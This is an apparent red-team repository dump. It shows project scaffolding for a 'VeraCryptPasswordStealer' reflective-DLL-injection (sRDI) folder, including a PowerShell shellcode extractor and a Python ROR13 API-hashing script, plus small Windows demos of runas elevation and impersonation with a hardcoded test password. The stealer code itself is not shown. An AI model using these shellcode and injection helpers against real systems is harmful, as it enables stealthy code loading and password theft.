system include files, 2 | // or project specific include files that are used frequently, but 3 | // are changed infrequently 4 | // 5 | 6 | #pragma once 7 | 8 | #include "targetver.h" 9 | 10 | #include 11 | #include 12 | 13 | 14 | 15 | // TODO: reference additional headers your program requires here 16 | -------------------------------------------------------------------------------- /coding/projects/VeraCryptPasswordStealer/sRDI/FunctionTest/targetver.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | // Including SDKDDKVer.h defines the highest available Windows platform. 4 | 5 | // If you wish to build your application for a previous Windows platform, include WinSDKVer.h and 6 | // set the _WIN32_WINNT macro to the platform you wish to support before including SDKDDKVer.h. 7 | 8 | #include 9 | -------------------------------------------------------------------------------- /coding/projects/VeraCryptPasswordStealer/sRDI/Native/stdafx.cpp: -------------------------------------------------------------------------------- 1 | // stdafx.cpp : source file that includes just the standard includes 2 | // RDIShellcodeCLoader.pch will be the pre-compiled header 3 | // stdafx.obj will contain the pre-compiled type information 4 | 5 | #include "stdafx.h" 6 | 7 | // TODO: reference any additional headers you need in STDAFX.H 8 | // and not in this file 9 | -------------------------------------------------------------------------------- /coding/projects/VeraCryptPasswordStealer/sRDI/Native/stdafx.h: -------------------------------------------------------------------------------- 1 | // stdafx.h : include file for standard system include files, 2 | // or project specific include files that are used frequently, but 3 | // are changed infrequently 4 | // 5 | 6 | #pragma once 7 | 8 | #include "targetver.h" 9 | 10 | #include 11 | #include 12 | 13 | 14 | 15 | // TODO: reference additional headers your program requires here 16 | -------------------------------------------------------------------------------- /coding/projects/VeraCryptPasswordStealer/sRDI/Native/targetver.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | // Including SDKDDKVer.h defines the highest available Windows platform. 4 | 5 | // If you wish to build your application for a previous Windows platform, include WinSDKVer.h and 6 | // set the _WIN32_WINNT macro to the platform you wish to support before including SDKDDKVer.h. 7 | 8 | #include 9 | -------------------------------------------------------------------------------- /coding/projects/VeraCryptPasswordStealer/sRDI/ShellcodeRDI/ShellcodeRDI.vcxproj.filters: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF} 6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx 7 | 8 | 9 | {93995380-89BD-4b04-88EB-625FBE52EBFB} 10 | h;hpp;hxx;hm;inl;inc;xsd 11 | 12 | 13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} 14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms 15 | 16 | 17 | 18 | 19 | Header Files 20 | 21 | 22 | 23 | 24 | Source Files 25 | 26 | 27 | -------------------------------------------------------------------------------- /coding/projects/VeraCryptPasswordStealer/sRDI/ShellcodeRDI/function_link_order.txt: -------------------------------------------------------------------------------- 1 | LoadDLL 2 | GetProcAddressWithHash -------------------------------------------------------------------------------- /coding/projects/VeraCryptPasswordStealer/sRDI/TestDLL/Resource.rc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xJs/RedTeaming_CheatSheet/dc0471476c0dbb52a0f23b503089fb28d6c2f903/coding/projects/VeraCryptPasswordStealer/sRDI/TestDLL/Resource.rc -------------------------------------------------------------------------------- /coding/projects/VeraCryptPasswordStealer/sRDI/TestDLL/TestDLL.vcxproj.filters: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF} 6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx 7 | 8 | 9 | {93995380-89BD-4b04-88EB-625FBE52EBFB} 10 | h;hh;hpp;hxx;hm;inl;inc;xsd 11 | 12 | 13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} 14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms 15 | 16 | 17 | 18 | 19 | Source Files 20 | 21 | 22 | -------------------------------------------------------------------------------- /coding/projects/VeraCryptPasswordStealer/sRDI/TestDLL/resource.h: -------------------------------------------------------------------------------- 1 | //{{NO_DEPENDENCIES}} 2 | // Microsoft Visual C++ generated include file. 3 | // Used by Resource.rc 4 | 5 | // Next default values for new objects 6 | // 7 | #ifdef APSTUDIO_INVOKED 8 | #ifndef APSTUDIO_READONLY_SYMBOLS 9 | #define _APS_NEXT_RESOURCE_VALUE 101 10 | #define _APS_NEXT_COMMAND_VALUE 40001 11 | #define _APS_NEXT_CONTROL_VALUE 1001 12 | #define _APS_NEXT_SYMED_VALUE 101 13 | #endif 14 | #endif 15 | -------------------------------------------------------------------------------- /coding/projects/VeraCryptPasswordStealer/sRDI/bin/.gitignore: -------------------------------------------------------------------------------- 1 | # Ignore everything in this directory 2 | * 3 | # Except this file 4 | !.gitignore -------------------------------------------------------------------------------- /coding/projects/VeraCryptPasswordStealer/sRDI/lib/PowerShell/Out-Shellcode.ps1: -------------------------------------------------------------------------------- 1 | Param ( 2 | [Parameter(Position = 0, Mandatory = $True)] 3 | [String] 4 | $InputExe, 5 | 6 | [Parameter(Position = 1, Mandatory = $True)] 7 | [ValidateScript({ Test-Path $_ })] 8 | [String] 9 | $InputMapFile, 10 | 11 | [Parameter(Position = 2, Mandatory = $True)] 12 | [String] 13 | $OutputFile 14 | ) 15 | 16 | # PowerShell v2 17 | if(!$PSScriptRoot){ 18 | $PSScriptRoot = Split-Path $MyInvocation.MyCommand.Path -Parent 19 | } 20 | 21 | . "$PSScriptRoot\Get-PEHeader.ps1" 22 | 23 | $PE = Get-PEHeader $InputExe -GetSectionData 24 | $TextSection = $PE.SectionHeaders | Where-Object { $_.Name -eq '.text' } 25 | 26 | $MapContents = Get-Content $InputMapFile 27 | 28 | $TextSectionInfo = @($MapContents | Where-Object { $_ -match '\.text.+CODE' })[0] 29 | 30 | $ShellcodeLength = [Int] "0x$(( $TextSectionInfo -split ' ' | Where-Object { $_ } )[1].TrimEnd('H'))" - 1 31 | 32 | Write-Host "Shellcode length: 0x$(($ShellcodeLength + 1).ToString('X4'))" 33 | 34 | [IO.File]::WriteAllBytes($OutputFile, $TextSection.RawData[0..$ShellcodeLength]) 35 | -------------------------------------------------------------------------------- /coding/projects/VeraCryptPasswordStealer/sRDI/lib/Python/FunctionToHash.py: -------------------------------------------------------------------------------- 1 | 2 | import sys 3 | 4 | ror = lambda val, r_bits, max_bits: \ 5 | ((val & (2**max_bits-1)) >> r_bits%max_bits) | \ 6 | (val << (max_bits-(r_bits%max_bits)) & (2**max_bits-1)) 7 | 8 | if len(sys.argv) != 2 and len(sys.argv) != 3: 9 | print("\nUsage:\nFunctionToHash.py [Module] [Function]\nFunctionToHash.py kernel32.dll CreateProcessA\n\nOR\n\nFunctionToHash.py [Function]\nFunctionToHash.py ExportedFunction") 10 | exit() 11 | 12 | if len(sys.argv) == 3: 13 | module = sys.argv[1].upper().encode('UTF-16LE') + b'\x00\x00' 14 | function = sys.argv[2].encode() + b'\x00' 15 | 16 | functionHash = 0 17 | 18 | for b in function: 19 | functionHash = ror(functionHash, 13, 32) 20 | functionHash += b 21 | 22 | moduleHash = 0 23 | 24 | for b in module: 25 | moduleHash = ror(moduleHash, 13, 32) 26 | moduleHash += b 27 | 28 | functionHash += moduleHash 29 | 30 | if functionHash > 0xFFFFFFFF: functionHash -= 0x100000000 31 | 32 | else: 33 | function = sys.argv[1].encode() + b'\x00' 34 | 35 | functionHash = 0 36 | 37 | for b in function: 38 | functionHash = ror(functionHash, 13, 32) 39 | functionHash += b 40 | 41 | 42 | print(hex(functionHash)) 43 | -------------------------------------------------------------------------------- /coding/projects/Windows_Security/.gitignore: -------------------------------------------------------------------------------- 1 | # Prerequisites 2 | *.d 3 | 4 | # Compiled Object files 5 | *.slo 6 | *.lo 7 | *.o 8 | *.obj 9 | 10 | # Precompiled Headers 11 | *.gch 12 | *.pch 13 | 14 | # Compiled Dynamic libraries 15 | *.so 16 | *.dylib 17 | *.dll 18 | 19 | # Fortran module files 20 | *.mod 21 | *.smod 22 | 23 | # Compiled Static libraries 24 | *.lai 25 | *.la 26 | *.a 27 | *.lib 28 | 29 | # Executables 30 | *.exe 31 | *.out 32 | *.app -------------------------------------------------------------------------------- /coding/projects/Windows_Security/Debug/SecurityHelper.idb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xJs/RedTeaming_CheatSheet/dc0471476c0dbb52a0f23b503089fb28d6c2f903/coding/projects/Windows_Security/Debug/SecurityHelper.idb -------------------------------------------------------------------------------- /coding/projects/Windows_Security/Debug/SecurityHelper.pdb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xJs/RedTeaming_CheatSheet/dc0471476c0dbb52a0f23b503089fb28d6c2f903/coding/projects/Windows_Security/Debug/SecurityHelper.pdb -------------------------------------------------------------------------------- /coding/projects/Windows_Security/SecurityHelper/Debug/SecurityHelper.lib.recipe: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | 6 | 7 | -------------------------------------------------------------------------------- /coding/projects/Windows_Security/SecurityHelper/Debug/SecurityHelper.log: -------------------------------------------------------------------------------- 1 |  SecurityHelper.cpp 2 | SecurityHelper.vcxproj -> C:\Users\user\source\repos\Security\Debug\SecurityHelper.lib 3 | -------------------------------------------------------------------------------- /coding/projects/Windows_Security/SecurityHelper/Debug/SecurityHelper.tlog/CL.command.1.tlog: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xJs/RedTeaming_CheatSheet/dc0471476c0dbb52a0f23b503089fb28d6c2f903/coding/projects/Windows_Security/SecurityHelper/Debug/SecurityHelper.tlog/CL.command.1.tlog -------------------------------------------------------------------------------- /coding/projects/Windows_Security/SecurityHelper/Debug/SecurityHelper.tlog/CL.read.1.tlog: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xJs/RedTeaming_CheatSheet/dc0471476c0dbb52a0f23b503089fb28d6c2f903/coding/projects/Windows_Security/SecurityHelper/Debug/SecurityHelper.tlog/CL.read.1.tlog -------------------------------------------------------------------------------- /coding/projects/Windows_Security/SecurityHelper/Debug/SecurityHelper.tlog/CL.write.1.tlog: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xJs/RedTeaming_CheatSheet/dc0471476c0dbb52a0f23b503089fb28d6c2f903/coding/projects/Windows_Security/SecurityHelper/Debug/SecurityHelper.tlog/CL.write.1.tlog -------------------------------------------------------------------------------- /coding/projects/Windows_Security/SecurityHelper/Debug/SecurityHelper.tlog/Lib-link.read.1.tlog: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xJs/RedTeaming_CheatSheet/dc0471476c0dbb52a0f23b503089fb28d6c2f903/coding/projects/Windows_Security/SecurityHelper/Debug/SecurityHelper.tlog/Lib-link.read.1.tlog -------------------------------------------------------------------------------- /coding/projects/Windows_Security/SecurityHelper/Debug/SecurityHelper.tlog/Lib-link.write.1.tlog: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xJs/RedTeaming_CheatSheet/dc0471476c0dbb52a0f23b503089fb28d6c2f903/coding/projects/Windows_Security/SecurityHelper/Debug/SecurityHelper.tlog/Lib-link.write.1.tlog -------------------------------------------------------------------------------- /coding/projects/Windows_Security/SecurityHelper/Debug/SecurityHelper.tlog/Lib.command.1.tlog: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xJs/RedTeaming_CheatSheet/dc0471476c0dbb52a0f23b503089fb28d6c2f903/coding/projects/Windows_Security/SecurityHelper/Debug/SecurityHelper.tlog/Lib.command.1.tlog -------------------------------------------------------------------------------- /coding/projects/Windows_Security/SecurityHelper/Debug/SecurityHelper.tlog/SecurityHelper.lastbuildstate: -------------------------------------------------------------------------------- 1 | PlatformToolSet=v142:VCToolArchitecture=Native32Bit:VCToolsVersion=14.29.30133:TargetPlatformVersion=10.0.19041.0: 2 | Debug|Win32|C:\Users\user\source\repos\Security\| 3 | -------------------------------------------------------------------------------- /coding/projects/Windows_Security/SecurityHelper/SecurityHelper.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | #include 4 | 5 | std::wstring SidToString(const PSID sid); 6 | PSID StringToSid(PCWSTR sidAsString); 7 | std::wstring SidToUserName(const PSID sid); 8 | std::wstring PrivilegeToString(LUID& luid); 9 | bool EnablePrivilege(PCWSTR name, bool enable); 10 | std::wstring SecurityDescriptorToString(PSECURITY_DESCRIPTOR sd, 11 | DWORD parts = OWNER_SECURITY_INFORMATION | DACL_SECURITY_INFORMATION); -------------------------------------------------------------------------------- /coding/projects/Windows_Security/SecurityHelper/SecurityHelper.vcxproj.user: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | -------------------------------------------------------------------------------- /coding/projects/Windows_Security/SecurityHelper/framework.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | #define WIN32_LEAN_AND_MEAN // Exclude rarely-used stuff from Windows headers 4 | -------------------------------------------------------------------------------- /coding/projects/Windows_Security/SecurityHelper/pch.cpp: -------------------------------------------------------------------------------- 1 | // pch.cpp: source file corresponding to the pre-compiled header 2 | 3 | #include "pch.h" 4 | 5 | // When you are using pre-compiled headers, this source file is necessary for compilation to succeed. 6 | -------------------------------------------------------------------------------- /coding/projects/Windows_Security/SecurityHelper/pch.h: -------------------------------------------------------------------------------- 1 | // pch.h: This is a precompiled header file. 2 | // Files listed below are compiled only once, improving build performance for future builds. 3 | // This also affects IntelliSense performance, including code completion and many code browsing features. 4 | // However, files listed here are ALL re-compiled if any one of them is updated between builds. 5 | // Do not add files here that you will be updating frequently as this negates the performance advantage. 6 | 7 | #ifndef PCH_H 8 | #define PCH_H 9 | 10 | // add headers that you want to pre-compile here 11 | #include 12 | #include 13 | 14 | #endif //PCH_H 15 | -------------------------------------------------------------------------------- /coding/projects/Windows_Security/SecurityHelper/x64/Debug/SecurityHelper.lib.recipe: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | 6 | 7 | -------------------------------------------------------------------------------- /coding/projects/Windows_Security/SecurityHelper/x64/Debug/SecurityHelper.log: -------------------------------------------------------------------------------- 1 |  SecurityHelper.cpp 2 | SecurityHelper.vcxproj -> C:\Users\user\source\repos\Security\x64\Debug\SecurityHelper.lib 3 | -------------------------------------------------------------------------------- /coding/projects/Windows_Security/SecurityHelper/x64/Debug/SecurityHelper.tlog/CL.command.1.tlog: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xJs/RedTeaming_CheatSheet/dc0471476c0dbb52a0f23b503089fb28d6c2f903/coding/projects/Windows_Security/SecurityHelper/x64/Debug/SecurityHelper.tlog/CL.command.1.tlog -------------------------------------------------------------------------------- /coding/projects/Windows_Security/SecurityHelper/x64/Debug/SecurityHelper.tlog/CL.read.1.tlog: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xJs/RedTeaming_CheatSheet/dc0471476c0dbb52a0f23b503089fb28d6c2f903/coding/projects/Windows_Security/SecurityHelper/x64/Debug/SecurityHelper.tlog/CL.read.1.tlog -------------------------------------------------------------------------------- /coding/projects/Windows_Security/SecurityHelper/x64/Debug/SecurityHelper.tlog/CL.write.1.tlog: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xJs/RedTeaming_CheatSheet/dc0471476c0dbb52a0f23b503089fb28d6c2f903/coding/projects/Windows_Security/SecurityHelper/x64/Debug/SecurityHelper.tlog/CL.write.1.tlog -------------------------------------------------------------------------------- /coding/projects/Windows_Security/SecurityHelper/x64/Debug/SecurityHelper.tlog/Lib-link.read.1.tlog: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xJs/RedTeaming_CheatSheet/dc0471476c0dbb52a0f23b503089fb28d6c2f903/coding/projects/Windows_Security/SecurityHelper/x64/Debug/SecurityHelper.tlog/Lib-link.read.1.tlog -------------------------------------------------------------------------------- /coding/projects/Windows_Security/SecurityHelper/x64/Debug/SecurityHelper.tlog/Lib-link.write.1.tlog: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xJs/RedTeaming_CheatSheet/dc0471476c0dbb52a0f23b503089fb28d6c2f903/coding/projects/Windows_Security/SecurityHelper/x64/Debug/SecurityHelper.tlog/Lib-link.write.1.tlog -------------------------------------------------------------------------------- /coding/projects/Windows_Security/SecurityHelper/x64/Debug/SecurityHelper.tlog/Lib.command.1.tlog: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xJs/RedTeaming_CheatSheet/dc0471476c0dbb52a0f23b503089fb28d6c2f903/coding/projects/Windows_Security/SecurityHelper/x64/Debug/SecurityHelper.tlog/Lib.command.1.tlog -------------------------------------------------------------------------------- /coding/projects/Windows_Security/SecurityHelper/x64/Debug/SecurityHelper.tlog/SecurityHelper.lastbuildstate: -------------------------------------------------------------------------------- 1 | PlatformToolSet=v142:VCToolArchitecture=Native32Bit:VCToolsVersion=14.29.30133:TargetPlatformVersion=10.0.19041.0: 2 | Debug|x64|C:\Users\user\source\repos\Security\| 3 | -------------------------------------------------------------------------------- /coding/projects/Windows_Security/SecurityHelper/x64/Release/SecurityHelper.lib.recipe: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | 6 | 7 | -------------------------------------------------------------------------------- /coding/projects/Windows_Security/SecurityHelper/x64/Release/SecurityHelper.log: -------------------------------------------------------------------------------- 1 |  SecurityHelper.cpp 2 | SecurityHelper.vcxproj -> C:\Users\user\source\repos\Security\x64\Release\SecurityHelper.lib 3 | -------------------------------------------------------------------------------- /coding/projects/Windows_Security/SecurityHelper/x64/Release/SecurityHelper.tlog/CL.command.1.tlog: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xJs/RedTeaming_CheatSheet/dc0471476c0dbb52a0f23b503089fb28d6c2f903/coding/projects/Windows_Security/SecurityHelper/x64/Release/SecurityHelper.tlog/CL.command.1.tlog -------------------------------------------------------------------------------- /coding/projects/Windows_Security/SecurityHelper/x64/Release/SecurityHelper.tlog/CL.read.1.tlog: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xJs/RedTeaming_CheatSheet/dc0471476c0dbb52a0f23b503089fb28d6c2f903/coding/projects/Windows_Security/SecurityHelper/x64/Release/SecurityHelper.tlog/CL.read.1.tlog -------------------------------------------------------------------------------- /coding/projects/Windows_Security/SecurityHelper/x64/Release/SecurityHelper.tlog/CL.write.1.tlog: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xJs/RedTeaming_CheatSheet/dc0471476c0dbb52a0f23b503089fb28d6c2f903/coding/projects/Windows_Security/SecurityHelper/x64/Release/SecurityHelper.tlog/CL.write.1.tlog -------------------------------------------------------------------------------- /coding/projects/Windows_Security/SecurityHelper/x64/Release/SecurityHelper.tlog/Lib-link.read.1.tlog: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xJs/RedTeaming_CheatSheet/dc0471476c0dbb52a0f23b503089fb28d6c2f903/coding/projects/Windows_Security/SecurityHelper/x64/Release/SecurityHelper.tlog/Lib-link.read.1.tlog -------------------------------------------------------------------------------- /coding/projects/Windows_Security/SecurityHelper/x64/Release/SecurityHelper.tlog/Lib-link.write.1.tlog: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xJs/RedTeaming_CheatSheet/dc0471476c0dbb52a0f23b503089fb28d6c2f903/coding/projects/Windows_Security/SecurityHelper/x64/Release/SecurityHelper.tlog/Lib-link.write.1.tlog -------------------------------------------------------------------------------- /coding/projects/Windows_Security/SecurityHelper/x64/Release/SecurityHelper.tlog/Lib.command.1.tlog: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xJs/RedTeaming_CheatSheet/dc0471476c0dbb52a0f23b503089fb28d6c2f903/coding/projects/Windows_Security/SecurityHelper/x64/Release/SecurityHelper.tlog/Lib.command.1.tlog -------------------------------------------------------------------------------- /coding/projects/Windows_Security/SecurityHelper/x64/Release/SecurityHelper.tlog/SecurityHelper.lastbuildstate: -------------------------------------------------------------------------------- 1 | PlatformToolSet=v142:VCToolArchitecture=Native32Bit:VCToolsVersion=14.29.30133:TargetPlatformVersion=10.0.19041.0: 2 | Release|x64|C:\Users\user\source\repos\Security\| 3 | -------------------------------------------------------------------------------- /coding/projects/Windows_Security/elevate/elevate.cpp: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | 5 | int main(int argc, const wchar_t* argv[]) 6 | { 7 | if (argc < 2) { 8 | printf("Usage: elevate [arguments] ... \n"); 9 | return 0; 10 | } 11 | 12 | std::wstring params; 13 | for (int i = 2; i < argc; i++) { 14 | params += argv[i]; 15 | params += L" "; 16 | } 17 | 18 | HINSTANCE hInstDll = ::ShellExecute(nullptr, L"runas", argv[1], params.c_str(), nullptr, SW_SHOWDEFAULT); 19 | if (HandleToLong(hInstDll) < 32) { 20 | printf("Error launching process (%u)\n", ::GetLastError()); 21 | } 22 | return 0; 23 | } 24 | 25 | -------------------------------------------------------------------------------- /coding/projects/Windows_Security/elevate/elevate.vcxproj.filters: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF} 6 | cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx 7 | 8 | 9 | {93995380-89BD-4b04-88EB-625FBE52EBFB} 10 | h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd 11 | 12 | 13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} 14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms 15 | 16 | 17 | 18 | 19 | Source Files 20 | 21 | 22 | -------------------------------------------------------------------------------- /coding/projects/Windows_Security/elevate/elevate.vcxproj.user: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | -------------------------------------------------------------------------------- /coding/projects/Windows_Security/elevate/x64/Release/elevate.exe.recipe: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | C:\Users\user\source\repos\Security\x64\Release\elevate.exe 6 | 7 | 8 | 9 | 10 | 11 | -------------------------------------------------------------------------------- /coding/projects/Windows_Security/elevate/x64/Release/elevate.iobj: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xJs/RedTeaming_CheatSheet/dc0471476c0dbb52a0f23b503089fb28d6c2f903/coding/projects/Windows_Security/elevate/x64/Release/elevate.iobj -------------------------------------------------------------------------------- /coding/projects/Windows_Security/elevate/x64/Release/elevate.ipdb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xJs/RedTeaming_CheatSheet/dc0471476c0dbb52a0f23b503089fb28d6c2f903/coding/projects/Windows_Security/elevate/x64/Release/elevate.ipdb -------------------------------------------------------------------------------- /coding/projects/Windows_Security/elevate/x64/Release/elevate.log: -------------------------------------------------------------------------------- 1 |  elevate.cpp 2 | Generating code 3 | 1 of 73 functions ( 1.4%) were compiled, the rest were copied from previous compilation. 4 | 0 functions were new in current compilation 5 | 0 functions had inline decision re-evaluated but remain unchanged 6 | Finished generating code 7 | elevate.vcxproj -> C:\Users\user\source\repos\Security\x64\Release\elevate.exe 8 | -------------------------------------------------------------------------------- /coding/projects/Windows_Security/elevate/x64/Release/elevate.tlog/CL.command.1.tlog: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xJs/RedTeaming_CheatSheet/dc0471476c0dbb52a0f23b503089fb28d6c2f903/coding/projects/Windows_Security/elevate/x64/Release/elevate.tlog/CL.command.1.tlog -------------------------------------------------------------------------------- /coding/projects/Windows_Security/elevate/x64/Release/elevate.tlog/CL.read.1.tlog: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xJs/RedTeaming_CheatSheet/dc0471476c0dbb52a0f23b503089fb28d6c2f903/coding/projects/Windows_Security/elevate/x64/Release/elevate.tlog/CL.read.1.tlog -------------------------------------------------------------------------------- /coding/projects/Windows_Security/elevate/x64/Release/elevate.tlog/CL.write.1.tlog: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xJs/RedTeaming_CheatSheet/dc0471476c0dbb52a0f23b503089fb28d6c2f903/coding/projects/Windows_Security/elevate/x64/Release/elevate.tlog/CL.write.1.tlog -------------------------------------------------------------------------------- /coding/projects/Windows_Security/elevate/x64/Release/elevate.tlog/elevate.lastbuildstate: -------------------------------------------------------------------------------- 1 | PlatformToolSet=v142:VCToolArchitecture=Native32Bit:VCToolsVersion=14.29.30133:TargetPlatformVersion=10.0.19041.0: 2 | Release|x64|C:\Users\user\source\repos\Security\| 3 | -------------------------------------------------------------------------------- /coding/projects/Windows_Security/elevate/x64/Release/elevate.tlog/link.command.1.tlog: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xJs/RedTeaming_CheatSheet/dc0471476c0dbb52a0f23b503089fb28d6c2f903/coding/projects/Windows_Security/elevate/x64/Release/elevate.tlog/link.command.1.tlog -------------------------------------------------------------------------------- /coding/projects/Windows_Security/elevate/x64/Release/elevate.tlog/link.read.1.tlog: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xJs/RedTeaming_CheatSheet/dc0471476c0dbb52a0f23b503089fb28d6c2f903/coding/projects/Windows_Security/elevate/x64/Release/elevate.tlog/link.read.1.tlog -------------------------------------------------------------------------------- /coding/projects/Windows_Security/elevate/x64/Release/elevate.tlog/link.write.1.tlog: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xJs/RedTeaming_CheatSheet/dc0471476c0dbb52a0f23b503089fb28d6c2f903/coding/projects/Windows_Security/elevate/x64/Release/elevate.tlog/link.write.1.tlog -------------------------------------------------------------------------------- /coding/projects/Windows_Security/elevate/x64/Release/vc142.pdb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xJs/RedTeaming_CheatSheet/dc0471476c0dbb52a0f23b503089fb28d6c2f903/coding/projects/Windows_Security/elevate/x64/Release/vc142.pdb -------------------------------------------------------------------------------- /coding/projects/Windows_Security/imp/imp.cpp: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | 4 | int main() 5 | { 6 | printf("Thread ID: %u\n", ::GetCurrentThreadId()); 7 | 8 | HANDLE hToken; 9 | if (!::LogonUser(L"test", L".", L"Welcome123!", LOGON32_LOGON_BATCH, LOGON32_PROVIDER_DEFAULT, &hToken)) { 10 | printf("Error (%u)\n", ::GetLastError()); 11 | return 1; 12 | } 13 | 14 | if (::ImpersonateLoggedOnUser(hToken)) { 15 | // do work as test 16 | 17 | ::RevertToSelf(); 18 | } 19 | ::CloseHandle(hToken); 20 | return 0; 21 | } -------------------------------------------------------------------------------- /coding/projects/Windows_Security/imp/imp.vcxproj.filters: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF} 6 | cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx 7 | 8 | 9 | {93995380-89BD-4b04-88EB-625FBE52EBFB} 10 | h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd 11 | 12 | 13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} 14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms 15 | 16 | 17 | 18 | 19 | Source Files 20 | 21 | 22 | -------------------------------------------------------------------------------- /coding/projects/Windows_Security/imp/imp.vcxproj.user: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | -------------------------------------------------------------------------------- /coding/projects/Windows_Security/imp/x64/Release/imp.exe.recipe: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | C:\Users\user\source\repos\Security\x64\Release\imp.exe 6 | 7 | 8 | 9 | 10 | 11 | -------------------------------------------------------------------------------- /coding/projects/Windows_Security/imp/x64/Release/imp.iobj: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xJs/RedTeaming_CheatSheet/dc0471476c0dbb52a0f23b503089fb28d6c2f903/coding/projects/Windows_Security/imp/x64/Release/imp.iobj -------------------------------------------------------------------------------- /coding/projects/Windows_Security/imp/x64/Release/imp.ipdb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xJs/RedTeaming_CheatSheet/dc0471476c0dbb52a0f23b503089fb28d6c2f903/coding/projects/Windows_Security/imp/x64/Release/imp.ipdb -------------------------------------------------------------------------------- /coding/projects/Windows_Security/imp/x64/Release/imp.log: -------------------------------------------------------------------------------- 1 |  imp.cpp 2 | Generating code 3 | Previous IPDB not found, fall back to full compilation. 4 | All 4 functions were compiled because no usable IPDB/IOBJ from previous compilation was found. 5 | Finished generating code 6 | imp.vcxproj -> C:\Users\user\source\repos\Security\x64\Release\imp.exe 7 | -------------------------------------------------------------------------------- /coding/projects/Windows_Security/imp/x64/Release/imp.tlog/CL.command.1.tlog: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xJs/RedTeaming_CheatSheet/dc0471476c0dbb52a0f23b503089fb28d6c2f903/coding/projects/Windows_Security/imp/x64/Release/imp.tlog/CL.command.1.tlog -------------------------------------------------------------------------------- /coding/projects/Windows_Security/imp/x64/Release/imp.tlog/CL.read.1.tlog: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xJs/RedTeaming_CheatSheet/dc0471476c0dbb52a0f23b503089fb28d6c2f903/coding/projects/Windows_Security/imp/x64/Release/imp.tlog/CL.read.1.tlog -------------------------------------------------------------------------------- /coding/projects/Windows_Security/imp/x64/Release/imp.tlog/CL.write.1.tlog: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xJs/RedTeaming_CheatSheet/dc0471476c0dbb52a0f23b503089fb28d6c2f903/coding/projects/Windows_Security/imp/x64/Release/imp.tlog/CL.write.1.tlog -------------------------------------------------------------------------------- /coding/projects/Windows_Security/imp/x64/Release/imp.tlog/imp.lastbuildstate: -------------------------------------------------------------------------------- 1 | 